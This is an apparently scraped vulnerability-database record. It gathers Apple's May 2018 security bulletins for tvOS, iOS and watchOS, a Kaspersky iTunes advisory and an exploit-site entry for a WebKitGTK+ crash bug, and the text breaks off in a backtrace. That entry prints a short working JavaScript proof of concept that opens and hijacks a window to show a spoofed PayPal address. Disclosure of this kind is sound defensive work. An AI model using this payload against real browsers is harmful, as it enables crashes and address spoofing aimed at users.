to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:33:34", "published": "2019-10-08T03:33:34", "id": "APPLE:HT208850", "href": "https://support.apple.com/kb/HT208850", "title": "About the security content of tvOS 11.4 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:12", "bulletinFamily": "software", "cvelist": ["CVE-2018-4211", "CVE-2018-4252", "CVE-2018-4223", "CVE-2018-4100", "CVE-2018-4227", "CVE-2018-4239", "CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4250", "CVE-2018-4199", "CVE-2018-4202", "CVE-2018-4330", "CVE-2018-4238", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4190", "CVE-2018-4221", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4247", "CVE-2018-4232", "CVE-2018-4244", "CVE-2018-4215", "CVE-2018-4243", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4215: Abraham Masri (@cheesecakeufo)\n\n**Bluetooth**\n\nAvailable for: iPhone X, iPhone 8, iPhone 8 Plus, iPad 6th generation, and iPad Air 2\n\nNot impacted: HomePod\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted vcf file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of phone numbers. This issue was addressed with improved validation of phone numbers.\n\nCVE-2018-4100: Abraham Masri (@cheesecakeufo)\n\n**CoreGraphics**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Core Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4330: Apple\n\nEntry added August 8, 2018\n\n**FontParser**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**iBooks**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in iBooks\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4202: Jerry Decime\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\nEntry updated October 8, 2019\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added October 30, 2018\n\n**Magnifier**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to view the last image used in Magnifier from the lockscreen\n\nDescription: A permissions issue existed in Magnifier. This was addressed with additional permission checks.\n\nCVE-2018-4239: an anonymous researcher\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker may be able to exfiltrate the contents of S/MIME-encrypted e-mail\n\nDescription: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.\n\nCVE-2018-4227: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\nCVE-2018-4250: Metehan Y\u0131lmaz of Sesim Sarpkaya\n\n**Safari**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Users may be tracked by malicious websites using client certificates\n\nDescription: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.\n\nCVE-2018-4221: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to enable Siri from the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4238: Baljinder Singh, Muhammad khizer javed, Onur Can BIKMAZ (@CanBkmaz) of Mustafa Kemal University\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to use Siri to read notifications of content that is set not to be displayed at the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4252: Hunter Byrnes, Martin Winkelmann (@Winkelmannnn)\n\n**Siri Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with physical access to a device may be able to see private contact information\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4244: an anonymous researcher\n\n**UIKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:21:43", "published": "2019-10-08T03:21:43", "id": "APPLE:HT208848", "href": "https://support.apple.com/kb/HT208848", "title": "About the security content of iOS 11.4 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:19", "bulletinFamily": "software", "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4187", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4243", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.3.1\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nNot impacted: Apple Watch Series 3\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Crash Reporter**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:38:09", "published": "2019-10-08T03:38:09", "id": "APPLE:HT208851", "href": "https://support.apple.com/kb/HT208851", "title": "About the security content of watchOS 4.3.1 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:41:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "### *Detect date*:\n05/29/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.5\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.5 for Windows](<https://support.apple.com/en-us/HT208852>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2018-4194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4194>)0.0Unknown \n[CVE-2018-4218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4218>)6.8High \n[CVE-2018-4246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4246>)6.8High \n[CVE-2018-4222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4222>)6.8High \n[CVE-2018-4224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4224>)2.1Warning \n[CVE-2018-4225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4225>)2.1Warning \n[CVE-2018-4226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4226>)2.1Warning \n[CVE-2018-4232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4232>)4.3Warning \n[CVE-2018-4233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4233>)6.8High \n[CVE-2018-4188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4188>)4.3Warning \n[CVE-2018-4190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4190>)4.3Warning \n[CVE-2018-4192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4192>)5.1High \n[CVE-2018-4199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4199>)6.8High \n[CVE-2018-4200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4200>)6.8High \n[CVE-2018-4201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4201>)6.8High \n[CVE-2018-4204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4204>)6.8High \n[CVE-2018-4214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4214>)6.8High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 37, "modified": "2020-06-18T00:00:00", "published": "2018-05-29T00:00:00", "id": "KLA11282", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11282", "title": "\r KLA11282Multiple vulnerabilities in Apple iTunes ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-06-06T21:48:57", "description": "webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.", "edition": 1, "published": "2018-06-06T00:00:00", "title": "WebKitGTK+ < 2.21.3 - pageURL Mishandling Crash (PoC) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-06T00:00:00", "id": "1337DAY-ID-30538", "href": "https://0day.today/exploit/description/30538", "sourceData": "# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) \r\n# Author: Dhiraj Mishra\r\n# Software: https://webkitgtk.org/\r\n# CVE: CVE-2018-11646\r\n# Summary:\r\n# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in \r\n# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, \r\n# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.\r\n \r\n# PoC:\r\n \r\n<script>\r\nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \r\nwindow.open(\"https://www.paypal.com\", \"WIN\"); \r\nwin.document.execCommand('Stop'); \r\nwin.document.write(\"Spoofed URL\"); \r\nwin.document.close();\r\n</script>\r\n \r\n \r\nBacktrace using fedora 27:\r\n \r\n#0 WTF::StringImpl::rawHash\r\nat 